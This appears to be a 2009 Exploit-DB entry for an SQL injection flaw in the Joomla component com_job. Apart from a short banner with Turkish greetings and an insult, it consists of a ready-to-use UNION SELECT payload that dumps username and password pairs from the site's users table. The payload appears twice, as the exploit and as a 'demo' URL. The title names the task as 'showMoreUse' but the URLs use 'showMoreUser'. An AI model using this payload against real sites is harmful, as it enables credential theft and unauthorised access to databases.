Joomla! Component com_job - 'showMoreUse' SQL Injection

EDB-ID:

10356

CVE:

N/A

Author:

Palyo34

Type:

webapps

Platform:

PHP

Published:

2009-12-08

/************************************************************************** 
  
[!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability 
[!] Author  : Palyo34  
[!] Homepage: http://www.1923turk.biz
[!] Date    : 12 08, 2009  
  
**************************************************************************/ 
[+] Manas58
[+] Topunuzun a.q 
[+] aponun picleri 
[+] 
[+] 
[+] 7 KAHRAMAN fiEH›D›M›Z› SAYGIYLA ANIYORUZ ALLAH RAHMET EYLES›N  

  

  
  
=========================================================================== 
  
 
  
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL] 
  
[ Exploit ] 
  
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--

[ Demo ]

http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
  
  
===========================================================================